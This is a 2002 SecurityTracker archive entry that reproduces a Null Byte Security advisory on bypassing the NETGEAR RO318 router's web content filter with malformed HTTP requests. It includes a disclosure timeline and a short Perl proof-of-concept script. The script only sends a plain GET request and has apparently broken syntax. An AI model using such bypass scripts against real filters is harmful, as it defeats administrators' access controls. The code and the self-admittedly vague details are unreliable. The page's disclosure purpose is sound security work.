Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Report a vulnerability that you have found to SecurityTracker
|
|
|
|
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
|
|
|
|
|
|
|
|
|
|
|
NETGEAR Router Web Content Filtering Mechanism Can Be Bypassed By Remote Users With Certain Malformed HTTP GET Requests
|
Date: Jan 31 2002
|
Impact: Host/resource access via network
|
Exploit Included: Yes
|
Version(s): RO318
|
Description: A vulnerability was reported in NETGEAR's RO318 Cable/DSL Security Router. A remote user can bypass the web content filtering restrictions.
It is reported that a remote user can send a malformed URL request through the router to access restricted web site URLs. The web filtering component in firmware reportedly only checks for fully constructed requests.
|
Impact: A remote user can access restricted web content.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.netgear.com/product_view.asp?xrp=4&yrp=12&zrp=96 (Links to External Site)
|
Cause: Input validation error
|
Reported By: nbs@tampabay.rr.com
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 31 Jan 2002 03:23:13 -0500
From: nbs@tampabay.rr.com
Subject: NetGear RO318 HTTP Filter Advisory
|
This is a multi-part message in MIME format.
--------------6069F46AB530F429AB1AF289
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
http://home.tampabay.rr.com/nbs/advisories/netgear/netgear.txt
--------------6069F46AB530F429AB1AF289
Content-Type: text/plain; charset=us-ascii;
name="netgear.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="netgear.txt"
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ NetGear RO318 HTTP Filter Advisory =+
=+ Null Byte Security =+
=+ http://home.tampabay.rr.com/nbs/ =+
=+ don't call it a come back =+
=+ nbs@tampabay.rr.com =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ Contents Table =+
=+ =+
=+ 1.About =+
=+ 2.Affected =+
=+ 3.Details =+
=+ 4.Contact =+
=+ 5.Conclusion =+
=+ 6.Thanks =+
=+ 7.Greets =+
=+ 8.POC =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 1.About =+
=+ =+
=+ NETGEAR's sturdy metal RO318 Cable/DSL Security Router with 8-port switch =+
=+ fully protects your small office network against intrusion. Equipped with =+
=+ Stateful Packet Inspection to prevent Denial of Service (DoS) attacks, and =+
=+ Network Address Translation (NAT) to maintain network security against =+
=+ hackers, it ensures prolonged up time and maximized productivity for your =+
=+ network. Web content filtering options let network administrators establish =+
=+ restricted access policies - based on the time of day, day of week, Web =+
=+ address keyword - and receive regular reports and instant alerts via e-mail on =+
=+ hacker attempts and browsing activities. Web-based installation instructions =+
=+ make setup easy. Your network up and running, and sharing high-speed Internet =+
=+ access with up to 253 users, in less than an hour. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 2.Affected =+
=+ =+
=+ NetGear RO318 Cable/DSL Security Router =+
=+ =+
=+ Although the NetGear RO318 is the only router listed here we are sure there =+
=+ other routers that use the RO318's web filtering technology. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 3.Details =+
=+ =+
=+ We are not too sure of the details ourselves because of time restraints, but =+
=+ we do have an idea. One, the web filtering component in the firmware only =+
=+ checks for fully constructed requests and thus sending a malformed, somewhat, =+
=+ request results in the retrieval of restricted content. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 4.Contact =+
=+ =+
=+ December 2 2001: Contacted NetGear =+
=+ December 2 2001: Contacted online support =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460001) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460003) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460006) =+
=+ December 3 2001: NetGear sent back an e-mail ticket number (NGI50460008) =+
=+ December 8 2001: Five working days passed =+
=+ December 20 2001: Eighteen days passed =+
=+ December 20 2001: Advisory released on home.tampabay.rr.com/nbs/ =+
=+ December 26 2001: POC released =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 5.Conclusion =+
=+ =+
=+ This is definitely a security vulnerability and not a feature. We hope Net =+
=+ Gear will fix this with their next firmware release so administrators can =+
=+ restrict necessary web-content without having to worry about this bug. =+
=+ =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 6.Thanks =+
=+ =+
=+ Bi0cide for the help =+
=+ Datagram for the help =+
=+ Natas for the help =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 7.Greets =+
=+ =+
=+ Bi0cide, Natas, Datagram, Z, Medium, BrainStorm, Qitest1, Skerbi, RootX11, =+
=+ Doug, Bios Disk, Decypher, Notten, RFP, Johnny (johnny.ihackstuff.com), RFP, =+
=+ Mixter, Pimpshiz, Doxavg, Todd, Sekurity Inc (www.sekurity.net), Packet Storm, =+
=+ Security Focus, and everyone else. =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ 8.POC =+
=+ =+
#!/usr/bin/perl
#don't call it a come back
#nbs@tampabay.rr.com
use IO::Socket;
use Getopt::Std;
getopts('h:p:z', \%argv);
if(!defined($argv{h}))
print"NetGear RO318 Web Filter Bypass Exploit by Null Byte Security \n";
print"Usage: $0 -h <host> -p <port> \n";
exit;
if(defined($argv{h}))
&begin
sub begin
$html = html;
$host = $argv{h};
if(defined $argv{p})
{
$port=$argv{p};
}
else
{
$port = "80";
}
$socket = IO::Socket::INET->new (Proto => "tcp",
PeerAddr => $host,
PeerPort => "$port")
or die "Connection Refused.\n";
print $socket "GET / HTTP/1.0\n\n";
while (<$socket>)
{
open(LOG, ">>$html");
print (LOG);
}
close $socket;
=+ =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
=+ http://www.wiretrip.net/rfp/policy.html =+
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
--------------6069F46AB530F429AB1AF289--
|
|
Go to the Top of This SecurityTracker Archive Page
|
